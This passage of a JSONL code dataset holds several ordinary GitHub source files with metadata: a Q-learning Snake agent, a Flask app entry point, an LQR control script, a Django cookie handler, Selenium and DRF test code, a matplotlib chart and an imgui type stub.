c='k', marker='o')\r\n plt.show()\r\n", "repo_name": "dotmet/pypolymer", "sub_path": "pypolymer/analyze/lammps/repository/plotaxis.py", "file_name": "plotaxis.py", "file_ext": "py", "file_size_in_byte": 1416, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "17230051528", "text": "from collections import defaultdict\r\nimport numpy as np\r\nfrom snake_environment import SnakeEnv\r\n\r\n\r\ndef create_zeroes_array():\r\n return np.zeros(size_of_action_space)\r\n\r\nclass snakeAgent:\r\n\r\n\r\n def __init__(\r\n self,\r\n learning_rate: float,\r\n initial_epsilon: float,\r\n epsilon_decay: float,\r\n final_epsilon: float,\r\n discount_factor: float = 0.95,\r\n env: SnakeEnv = None\r\n ):\r\n \"\"\"Initialize a Reinforcement Learning agent with an empty dictionary\r\n of state-action values (q_values), a learning rate and an epsilon.\r\n\r\n Args:\r\n learning_rate: The learning rate\r\n initial_epsilon: The initial epsilon value\r\n epsilon_decay: The decay for epsilon\r\n final_epsilon: The final epsilon value\r\n discount_factor: The discount factor for computing the Q-value\r\n \"\"\"\r\n global size_of_action_space\r\n size_of_action_space = env.action_space.n\r\n\r\n self.q_values = defaultdict(create_zeroes_array)\r\n self.lr = learning_rate\r\n self.discount_factor = discount_factor\r\n self.epsilon = initial_epsilon\r\n self.epsilon_decay = epsilon_decay\r\n self.final_epsilon = final_epsilon\r\n self.training_error = []\r\n\r\n self._action_to_direction = {\r\n 'up': 0,\r\n 'down': 1,\r\n 'left': 2,\r\n 'right':3,\r\n }\r\n\r\n def get_action(self, obs, env, is_training = True):\r\n \"\"\"\r\n Returns the best action with probability (1 - epsilon)\r\n otherwise a random action with probability epsilon to ensure exploration.\r\n \"\"\"\r\n obs = (obs['quad_apple'], \r\n #obs['quad_c_of_m'], \r\n obs['surroundings'][0], obs['surroundings'][1], obs['surroundings'][2]\r\n ) \r\n if is_training:\r\n # with probability epsilon return a random action to explore the environment\r\n if np.random.random() < self.epsilon:\r\n return env.action_space.sample()\r\n # with probability (1 - epsilon) act greedily (exploit)\r\n else:\r\n return (np.argmax(self.q_values[obs]))\r\n else:\r\n return (np.argmax(self.q_values[obs]))\r\n\r\n def update(\r\n self,\r\n obs,\r\n action: int,\r\n reward: float,\r\n terminated: bool,\r\n next_obs,\r\n ):\r\n \"\"\"Updates the Q-value of an action.\"\"\"\r\n obs = (obs['quad_apple'], \r\n #obs['quad_c_of_m'], \r\n obs['surroundings'][0], obs['surroundings'][1], obs['surroundings'][2]\r\n )\r\n next_obs = (next_obs['quad_apple'], \r\n #next_obs['quad_c_of_m'], \r\n next_obs['surroundings'][0], next_obs['surroundings'][1], next_obs['surroundings'][2]\r\n )\r\n future_q_value = (not terminated) * np.max(self.q_values[next_obs])\r\n temporal_difference = (\r\n reward + self.discount_factor * 
future_q_value - self.q_values[obs][action]\r\n        )\r\n        self.q_values[obs][action] = (\r\n            self.q_values[obs][action] + self.lr * temporal_difference\r\n        )\r\n        self.training_error.append(temporal_difference)\r\n\r\n    def decay_epsilon(self):\r\n        self.epsilon = max(self.final_epsilon, self.epsilon - self.epsilon_decay)\r\n", "repo_name": "Kuzcop/snake", "sub_path": "snake_agent.py", "file_name": "snake_agent.py", "file_ext": "py", "file_size_in_byte": 3421, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.zeros", "line_number": 7, "usage_type": "call"}, {"api_name": "snake_environment.SnakeEnv", "line_number": 19, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "28421753482", "text": "import atexit\nimport os\n\nfrom flask import Flask\n\nfrom components import *\nfrom database import connectDatabase, disconnectDatabase\nfrom functions import log\nfrom routers import routers\n\ntry:\n    try:\n        # Read the configuration file\n        config = readConfigFile()\n    except FileNotFoundError as e:\n        log('找不到配置文件,错误信息:')\n        log(e)\n    except IOError as e:\n        log('配置文件读取失败,错误信息:')\n        log(e)\n    else:\n        LISTEN_PORT = config['Server']['ListenPort']\n        DATABASE_NAME = config['Database']['Name']\n        DATABASE_ADDRESS = config['Database']['Address']\n        DATABASE_PORT = config['Database']['Port']\n        DATABASE_USERNAME = config['Database']['Username']\n        DATABASE_PASSWORD = config['Database']['Password']\n        NOTE_FILE_POSITION = config['File']['NoteFilePosition']\n\n        # Connect to the database; exit the program immediately if the connection fails\n        try:\n            connectDatabase(DATABASE_ADDRESS, DATABASE_PORT, DATABASE_NAME, DATABASE_USERNAME,\n                            DATABASE_PASSWORD)\n        except IOError as e:\n            log('数据库连接失败,错误信息:')\n            log(e)\n        else:\n            try:\n                # Create the folder used to store note files\n                os.makedirs(NOTE_FILE_POSITION, 0o777, True)\n            except IOError as e:\n                log('笔记存储文件夹不存在且创建失败,错误信息:')\n                log(e)\n            else:\n                # Flask setup\n                app = Flask(__name__, static_folder = 'static/build')\n                app.secret_key = os.urandom(24)\n\n                # Register all routes\n                routers.registerRouters(app)\n\n                # Close the database connection before the application exits\n                atexit.register(disconnectDatabase)\n\n                if __name__ == '__main__':\n                    log('服务器运行在 {0} 端口上'.format(LISTEN_PORT))\n                    app.run(host = '0.0.0.0', port = LISTEN_PORT, debug = False)\n\nexcept Exception as e:\n    log('未能捕获的错误,错误信息:')\n    log(e)\n", "repo_name": "Soulike/Class-Note-Manager-Python", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2153, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "functions.log", "line_number": 16, "usage_type": "call"}, {"api_name": "functions.log", "line_number": 17, "usage_type": "call"}, {"api_name": "functions.log", "line_number": 19, "usage_type": "call"}, {"api_name": "functions.log", "line_number": 20, "usage_type": "call"}, {"api_name": "database.connectDatabase", "line_number": 32, "usage_type": "call"}, {"api_name": "functions.log", "line_number": 35, "usage_type": "call"}, {"api_name": "functions.log", "line_number": 36, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 40, "usage_type": "call"}, {"api_name": 
"functions.log", "line_number": 42, "usage_type": "call"}, {"api_name": "functions.log", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 46, "usage_type": "call"}, {"api_name": "os.urandom", "line_number": 47, "usage_type": "call"}, {"api_name": "routers.routers.registerRouters", "line_number": 50, "usage_type": "call"}, {"api_name": "routers.routers", "line_number": 50, "usage_type": "name"}, {"api_name": "atexit.register", "line_number": 53, "usage_type": "call"}, {"api_name": "database.disconnectDatabase", "line_number": 53, "usage_type": "argument"}, {"api_name": "functions.log", "line_number": 56, "usage_type": "call"}, {"api_name": "functions.log", "line_number": 60, "usage_type": "call"}, {"api_name": "functions.log", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "3461681959", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport numpy as np\nimport scipy\nimport control\nfrom dtk.bicycle import benchmark_state_space_vs_speed, benchmark_matrices\n\n\ndef compute_whipple_lqr_gain(velocity):\n _, A, B = benchmark_state_space_vs_speed(*benchmark_matrices(), velocity)\n Q = np.diag([1e5, 1e3, 1e3, 1e2])\n R = np.eye(2)\n\n gains = [control.lqr(Ai, Bi, Q, R)[0] for Ai, Bi in zip(A, B)]\n return gains\n\n\nif __name__ == '__main__':\n import sys\n\n v_low = 0 # m/s\n if len(sys.argv) > 1:\n v_high = int(sys.argv[1])\n else:\n v_high = 1 # m/s\n\n velocities = [v_low, v_high]\n gains = compute_whipple_lqr_gain(velocities)\n\n for v, K in zip(velocities, gains):\n print('computed LQR controller feedback gain for v = {}'.format(v))\n K = -K\n for r in range(K.shape[0]):\n row = ', '.join(str(elem) for elem in K[r, :])\n if r != K.shape[0] - 1:\n row += ','\n print(row)\n print()\n", "repo_name": "oliverlee/phobos", "sub_path": "scripts/calculate_lqr_gain.py", "file_name": "calculate_lqr_gain.py", "file_ext": "py", "file_size_in_byte": 1001, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "dtk.bicycle.benchmark_state_space_vs_speed", "line_number": 10, "usage_type": "call"}, {"api_name": "dtk.bicycle.benchmark_matrices", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 12, "usage_type": "call"}, {"api_name": "control.lqr", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 22, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}]} +{"seq_id": "15557576177", "text": "import json\nimport traceback\nimport pandas as pd\npd.set_option('display.max_rows',500)\npd.set_option('display.max_columns',500)\npd.set_option('display.width',1000)\nimport requests\n\n__author__ = 'wangjian'\n\n# host = '127.0.0.1:5001'\nhost = '192.168.3.212:8080'\n\ndef conn_FromCode(body=None):\n try:\n headers = {\"Content-Type\": \"application/json\"}\n url = \"http://{}/api/fromCode\".format(host)\n response = requests.post(url, data=json.dumps(body), headers=headers).content.decode()\n response_json = json.loads(response)\n # print(response_json)\n if response_json[\"resultCode\"] == 0:\n if response_json.get('data'):\n df_data = pd.DataFrame(response_json['data'])\n columns_list = []\n field_list = body.get('field_list')\n if field_list:\n columns_list = ['code', 'name']\n columns_list.extend(field_list)\n df_data.columns = columns_list\n return df_data\n else:\n return 'no data exist.'\n else:\n return 
'select error.'\n except Exception:\n print(traceback.format_exc())\n\n\nif __name__ == '__main__':\n from pprint import pprint\n\n # code_list = [\"600006.SH\"]\n # code_list = [\"000858.SZ\",\"600722.SH\",\"000895.SZ\",\"600006.SH\"]\n code_list = [\"000858.SZ\"]\n\n\n # table = 'QT_DailyQuote'\n # field_list = [\"TradingDay\", \"PrevClosePrice\", \"OpenPrice\", \"HighPrice\", \"LowPrice\"]\n\n # table = 'QT_Performance'\n # field_list = [\"TradingDay\", \"PrevClosePrice\", \"TurnoverVolume\", \"RangePCT\", \"ChangePCTRW\"]\n\n # table = 'QT_PerformanceData'\n # field_list = [\"MaxRisingUpDays\", \"AHPremiumRate50\", \"TradingDay\", \"HighestPrice\", \"HighestPriceTW\"]\n\n table = 'LC_DIndicesForValuation'\n field_list = [\"TradingDay\", \"PB\", \"PCFTTM\", \"PCFS\", \"PS\", \"PE\"]\n\n # table = 'LC_SHSZHSCHoldings'\n # field_list = [\"SHSZHSCode\", \"SecuAbbr\", \"SharesHolding\", \"Holdratio\", \"InsertTime\"]\n\n body = {\n \"table\": table,\n \"code_list\": code_list,\n # \"all_code\": True,\n \"field_list\": field_list,\n \"alterField\": \"TradingDay\",\n # \"alterField\": \"EndDate\",\n \"startDate\": \"2020-08-10\",\n \"endDate\": \"2020-08-12\"\n }\n\n data = conn_FromCode(body)\n print(data)\n pe_data = data['PE'].tolist()[-1]\n print(pe_data)\n\n\n\n\n\n", "repo_name": "296348304/ngwshare", "sub_path": "conn_test/conn_code.py", "file_name": "conn_code.py", "file_ext": "py", "file_size_in_byte": 2395, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.set_option", "line_number": 4, "usage_type": "call"}, {"api_name": "pandas.set_option", "line_number": 5, "usage_type": "call"}, {"api_name": "pandas.set_option", "line_number": 6, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 18, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 18, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 23, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "37251468661", "text": "import logging\n\nfrom urllib import quote, unquote\n\nfrom django.contrib.auth.models import AnonymousUser\nfrom django.utils.translation import ugettext as _\n\nfrom astakos.im import settings\nimport astakos.im.messages as astakos_messages\n\nlogger = logging.getLogger(__name__)\n\n\nclass CookieHandler():\n def __init__(self, request, response=None):\n cookies = getattr(request, 'COOKIES', {})\n cookie = unquote(cookies.get(settings.COOKIE_NAME, ''))\n self.uuid, sep, self.auth_token = cookie.partition('|')\n self.request = request\n self.response = response\n\n @property\n def uuid(self):\n return getattr(self, 'uuid', '')\n\n @property\n def auth_token(self):\n return getattr(self, 'auth_token', '')\n\n @property\n def is_set(self):\n no_token = not self.auth_token\n return not no_token\n\n @property\n def is_valid(self):\n cookie_attribute = 'uuid' if not settings.TRANSLATE_UUIDS else 'username'\n return (self.uuid == getattr(self.user, cookie_attribute, '') and\n self.auth_token == getattr(self.user, 'auth_token', ''))\n\n @property\n def user(self):\n return getattr(self.request, 'user', AnonymousUser())\n\n def __set(self):\n if not self.response:\n raise ValueError(_(astakos_messages.NO_RESPONSE))\n user = self.user\n expire_fmt = user.auth_token_expires.strftime(\n '%a, %d-%b-%Y %H:%M:%S %Z')\n if settings.TRANSLATE_UUIDS:\n cookie_value 
= quote(user.username + '|' + user.auth_token)\n else:\n cookie_value = quote(user.uuid + '|' + user.auth_token)\n self.response.set_cookie(\n settings.COOKIE_NAME, value=cookie_value, expires=expire_fmt, path='/',\n domain=settings.COOKIE_DOMAIN, secure=settings.COOKIE_SECURE\n )\n msg = str(('Cookie [expiring %(auth_token_expires)s]',\n 'set for %(uuid)s')) % user.__dict__\n logger._log(settings.LOGGING_LEVEL, msg, [])\n\n def __delete(self):\n if not self.response:\n raise ValueError(_(astakos_messages.NO_RESPONSE))\n self.response.delete_cookie(\n settings.COOKIE_NAME, path='/', domain=settings.COOKIE_DOMAIN)\n msg = 'Cookie deleted for %(uuid)s' % self.__dict__\n logger._log(settings.LOGGING_LEVEL, msg, [])\n\n def fix(self, response=None):\n self.response = response or self.response\n try:\n if self.user.is_authenticated():\n if not self.is_set or not self.is_valid:\n self.__set()\n else:\n if self.is_set:\n self.__delete()\n except AttributeError:\n pass\n", "repo_name": "mpastyl/websocket-console", "sub_path": "synnefo/snf-astakos-app/astakos/im/cookie.py", "file_name": "cookie.py", "file_ext": "py", "file_size_in_byte": 2728, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "urllib.unquote", "line_number": 17, "usage_type": "call"}, {"api_name": "astakos.im.settings.COOKIE_NAME", "line_number": 17, "usage_type": "attribute"}, {"api_name": "astakos.im.settings", "line_number": 17, "usage_type": "name"}, {"api_name": "astakos.im.settings.TRANSLATE_UUIDS", "line_number": 37, "usage_type": "attribute"}, {"api_name": "astakos.im.settings", "line_number": 37, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.AnonymousUser", "line_number": 43, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 47, "usage_type": "call"}, {"api_name": "astakos.im.messages.NO_RESPONSE", "line_number": 47, "usage_type": "attribute"}, {"api_name": "astakos.im.messages", "line_number": 47, "usage_type": "name"}, {"api_name": "astakos.im.settings.TRANSLATE_UUIDS", "line_number": 51, "usage_type": "attribute"}, {"api_name": "astakos.im.settings", "line_number": 51, "usage_type": "name"}, {"api_name": "urllib.quote", "line_number": 52, "usage_type": "call"}, {"api_name": "urllib.quote", "line_number": 54, "usage_type": "call"}, {"api_name": "astakos.im.settings.COOKIE_NAME", "line_number": 56, "usage_type": "attribute"}, {"api_name": "astakos.im.settings", "line_number": 56, "usage_type": "name"}, {"api_name": "astakos.im.settings.COOKIE_DOMAIN", "line_number": 57, "usage_type": "attribute"}, {"api_name": "astakos.im.settings", "line_number": 57, "usage_type": "name"}, {"api_name": "astakos.im.settings.COOKIE_SECURE", "line_number": 57, "usage_type": "attribute"}, {"api_name": "astakos.im.settings.LOGGING_LEVEL", "line_number": 61, "usage_type": "attribute"}, {"api_name": "astakos.im.settings", "line_number": 61, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 65, "usage_type": "call"}, {"api_name": "astakos.im.messages.NO_RESPONSE", "line_number": 65, "usage_type": "attribute"}, {"api_name": "astakos.im.messages", "line_number": 65, "usage_type": "name"}, {"api_name": "astakos.im.settings.COOKIE_NAME", "line_number": 67, "usage_type": "attribute"}, {"api_name": "astakos.im.settings", "line_number": 67, "usage_type": "name"}, {"api_name": 
"astakos.im.settings.COOKIE_DOMAIN", "line_number": 67, "usage_type": "attribute"}, {"api_name": "astakos.im.settings.LOGGING_LEVEL", "line_number": 69, "usage_type": "attribute"}, {"api_name": "astakos.im.settings", "line_number": 69, "usage_type": "name"}]} +{"seq_id": "14002928468", "text": "# !/usr/bin/env/ python\n# -*- coding: utf-8 -*-\nimport time\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nfrom test_weixin_web.test_weixin_op.basepage import BasePage\n\n\nclass ContactPage(BasePage):\n\n def clic_add_member(self):\n from test_weixin_web.test_weixin_op.add_member_page import AddMemberPage\n ele = (By.CSS_SELECTOR, \".ww_operationBar .js_add_member\")\n # 显示等待,等待元素是可点击状态\n # WebDriverWait(self.driver, 10).until(expected_conditions.element_to_be_clickable(ele))\n self.wait_for_click(ele, 10)\n # 解决点击无效问题;设置死循环多次点击,直到目标元素出现后,跳出死循环\n while True:\n self.find(*ele).click()\n element = self.finds(By.ID, \"username\")\n if len(element) > 0:\n break\n\n return AddMemberPage(self.driver)\n\n def get_member(self):\n time.sleep(1)\n eles = self.finds(By.CSS_SELECTOR, \".member_colRight_memberTable_td:nth-child(2)\")\n name_list = []\n for value in eles:\n # 获取元素属性title的值,存入list内\n print(value.get_attribute(\"title\"))\n name_list.append(value.get_attribute(\"title\"))\n\n return name_list\n", "repo_name": "jennymyy86/Python-practice-task", "sub_path": "python_pratice/test_weixin_web/test_weixin_op/contact_page.py", "file_name": "contact_page.py", "file_ext": "py", "file_size_in_byte": 1420, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "test_weixin_web.test_weixin_op.basepage.BasePage", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 17, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 17, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 24, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 24, "usage_type": "name"}, {"api_name": "test_weixin_web.test_weixin_op.add_member_page.AddMemberPage", "line_number": 28, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 31, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 32, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "39902240394", "text": "from django.contrib import admin\nfrom django.urls import path, include\n\nfrom rest_framework.routers import DefaultRouter\n\nfrom api.views import AnuncioViewSet,CategoriaViewSet,HabilidadViewSet,FacultadViewSet,PersonaViewSet,ConsumidorViewSet,SugerenciaViewSet,NoticiaViewSet,UserViewSet\n\nrouter = DefaultRouter()\nrouter.register(r'Anuncios',AnuncioViewSet)\nrouter.register(r'Categorias',CategoriaViewSet)\nrouter.register(r'Habilidades',HabilidadViewSet)\nrouter.register(r'Facultades',FacultadViewSet)\nrouter.register(r'Personas',PersonaViewSet)\nrouter.register(r'Consumidores',ConsumidorViewSet)\nrouter.register(r'Sugerencias',SugerenciaViewSet)\nrouter.register(r'Noticias',NoticiaViewSet)\nrouter.register(r'Usuarios',UserViewSet)\n\nurlpatterns = router.urls\n\nurlpatterns += [\n path('admin/', admin.site.urls),\n 
path(r'credenciales/',include('rest_auth.urls')),\n path(r'credenciales/registration',include('rest_auth.registration.urls')),\n]\n", "repo_name": "jose598/knoot.anywhere", "sub_path": "backend/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 948, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework.routers.DefaultRouter", "line_number": 8, "usage_type": "call"}, {"api_name": "api.views.AnuncioViewSet", "line_number": 9, "usage_type": "argument"}, {"api_name": "api.views.CategoriaViewSet", "line_number": 10, "usage_type": "argument"}, {"api_name": "api.views.HabilidadViewSet", "line_number": 11, "usage_type": "argument"}, {"api_name": "api.views.FacultadViewSet", "line_number": 12, "usage_type": "argument"}, {"api_name": "api.views.PersonaViewSet", "line_number": 13, "usage_type": "argument"}, {"api_name": "api.views.ConsumidorViewSet", "line_number": 14, "usage_type": "argument"}, {"api_name": "api.views.SugerenciaViewSet", "line_number": 15, "usage_type": "argument"}, {"api_name": "api.views.NoticiaViewSet", "line_number": 16, "usage_type": "argument"}, {"api_name": "api.views.UserViewSet", "line_number": 17, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 22, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 22, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 23, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "42347988329", "text": "from rest_framework.test import APITestCase\nfrom rest_framework.test import APIClient\nfrom model_mommy import mommy\nfrom collections import OrderedDict\n\n\nclass TestResponseOffer(APITestCase):\n\n def setUp(self):\n self.c = APIClient()\n\n def test_response_offer(self):\n user = mommy.make(\"accounts.user\")\n offer = mommy.make(\"rides.offer\", owner=user,\n status=\"Di\",\n _fill_optional=True)\n\n self.c.force_authenticate(user)\n\n data = {\n \"text\": \"Puedes llevarme?\"\n }\n\n response = self.c.post(\"/offers/{}/request/\".format(offer.id), data)\n self.assertEqual(response.status_code, 201, response.data)\n self.assertDictEqual.__self__.maxDiff = None\n\n def test_accept_response_offer(self):\n user = mommy.make(\"accounts.user\")\n offer = mommy.make(\"rides.offer\", owner=user,\n status=\"Di\",\n _fill_optional=True)\n request_post = mommy.make(\"rides.requestpost\", offer=offer,\n _fill_optional=True)\n\n self.c.force_authenticate(user)\n\n data = {\n \"request_id\": request_post.id\n }\n\n response = self.c.post(\"/my-offers/{}/accept-request/\".format(offer.id), data)\n self.assertEqual(response.status_code, 201, response.data)\n self.assertDictEqual.__self__.maxDiff = None\n\n", "repo_name": "richardbm/inteliruta-backend", "sub_path": "rides/tests/test_integration/test_response_offer.py", "file_name": "test_response_offer.py", "file_ext": "py", "file_size_in_byte": 1445, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework.test.APITestCase", "line_number": 7, "usage_type": "name"}, {"api_name": "rest_framework.test.APIClient", "line_number": 10, 
"usage_type": "call"}, {"api_name": "model_mommy.mommy.make", "line_number": 13, "usage_type": "call"}, {"api_name": "model_mommy.mommy", "line_number": 13, "usage_type": "name"}, {"api_name": "model_mommy.mommy.make", "line_number": 14, "usage_type": "call"}, {"api_name": "model_mommy.mommy", "line_number": 14, "usage_type": "name"}, {"api_name": "model_mommy.mommy.make", "line_number": 29, "usage_type": "call"}, {"api_name": "model_mommy.mommy", "line_number": 29, "usage_type": "name"}, {"api_name": "model_mommy.mommy.make", "line_number": 30, "usage_type": "call"}, {"api_name": "model_mommy.mommy", "line_number": 30, "usage_type": "name"}, {"api_name": "model_mommy.mommy.make", "line_number": 33, "usage_type": "call"}, {"api_name": "model_mommy.mommy", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "34961006228", "text": "import matplotlib.pyplot as plt; plt.rcdefaults()\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n\r\nobjects = ('driverRequest()', 'viewRideRequests()', 'choseRide()', 'rideRequest()', 'sendDriverEther()')\r\ny_pos = np.arange(len(objects))\r\nperformance = [0.04399,0.006146,0.004741,0.03912,0.007552]\r\n\r\nplt.bar(y_pos, performance, align='center', alpha=0.5, width = 0.8, color=['steelblue', 'steelblue', 'steelblue', 'cadetblue', 'cadetblue'])\r\n\r\nplt.xticks(y_pos, objects, rotation=45)\r\n\r\nplt.ylabel('Transaction Cost (USD)')\r\nplt.xlabel('Functions')\r\nplt.title('BlockTaxi USD/Transaction')\r\n\r\n\r\nplt.savefig('myfile.png', bbox_inches = \"tight\")\r\nplt.show()", "repo_name": "sophiegraham99/Blockchain-Uber-App", "sub_path": "graphs/transactionCost.py", "file_name": "transactionCost.py", "file_ext": "py", "file_size_in_byte": 665, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "matplotlib.pyplot.rcdefaults", "line_number": 1, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "24348033565", "text": "from imgui.core import *\nfrom imgui.extra import *\nfrom imgui import core as core, extra as extra, internal as internal\nfrom typing import Any\n\nVERSION: Any\nVERTEX_BUFFER_POS_OFFSET: Any\nVERTEX_BUFFER_UV_OFFSET: Any\nVERTEX_BUFFER_COL_OFFSET: Any\nVERTEX_SIZE: Any\nINDEX_SIZE: Any\nNONE: Any\nALWAYS: Any\nONCE: 
Any\nFIRST_USE_EVER: Any\nAPPEARING: Any\nKEY_TAB: Any\nKEY_LEFT_ARROW: Any\nKEY_RIGHT_ARROW: Any\nKEY_UP_ARROW: Any\nKEY_DOWN_ARROW: Any\nKEY_PAGE_UP: Any\nKEY_PAGE_DOWN: Any\nKEY_HOME: Any\nKEY_END: Any\nKEY_INSERT: Any\nKEY_DELETE: Any\nKEY_BACKSPACE: Any\nKEY_SPACE: Any\nKEY_ENTER: Any\nKEY_ESCAPE: Any\nKEY_PAD_ENTER: Any\nKEY_A: Any\nKEY_C: Any\nKEY_V: Any\nKEY_X: Any\nKEY_Y: Any\nKEY_Z: Any\nNAV_INPUT_ACTIVATE: Any\nNAV_INPUT_CANCEL: Any\nNAV_INPUT_INPUT: Any\nNAV_INPUT_MENU: Any\nNAV_INPUT_DPAD_LEFT: Any\nNAV_INPUT_DPAD_RIGHT: Any\nNAV_INPUT_DPAD_UP: Any\nNAV_INPUT_DPAD_DOWN: Any\nNAV_INPUT_L_STICK_LEFT: Any\nNAV_INPUT_L_STICK_RIGHT: Any\nNAV_INPUT_L_STICK_UP: Any\nNAV_INPUT_L_STICK_DOWN: Any\nNAV_INPUT_FOCUS_PREV: Any\nNAV_INPUT_FOCUS_NEXT: Any\nNAV_INPUT_TWEAK_SLOW: Any\nNAV_INPUT_TWEAK_FAST: Any\nKEY_MOD_NONE: Any\nKEY_MOD_CTRL: Any\nKEY_MOD_SHIFT: Any\nKEY_MOD_ALT: Any\nKEY_MOD_SUPER: Any\nSTYLE_ALPHA: Any\nSTYLE_WINDOW_PADDING: Any\nSTYLE_WINDOW_ROUNDING: Any\nSTYLE_WINDOW_BORDERSIZE: Any\nSTYLE_WINDOW_MIN_SIZE: Any\nSTYLE_WINDOW_TITLE_ALIGN: Any\nSTYLE_CHILD_ROUNDING: Any\nSTYLE_CHILD_BORDERSIZE: Any\nSTYLE_POPUP_ROUNDING: Any\nSTYLE_POPUP_BORDERSIZE: Any\nSTYLE_FRAME_PADDING: Any\nSTYLE_FRAME_ROUNDING: Any\nSTYLE_FRAME_BORDERSIZE: Any\nSTYLE_ITEM_SPACING: Any\nSTYLE_ITEM_INNER_SPACING: Any\nSTYLE_INDENT_SPACING: Any\nSTYLE_CELL_PADDING: 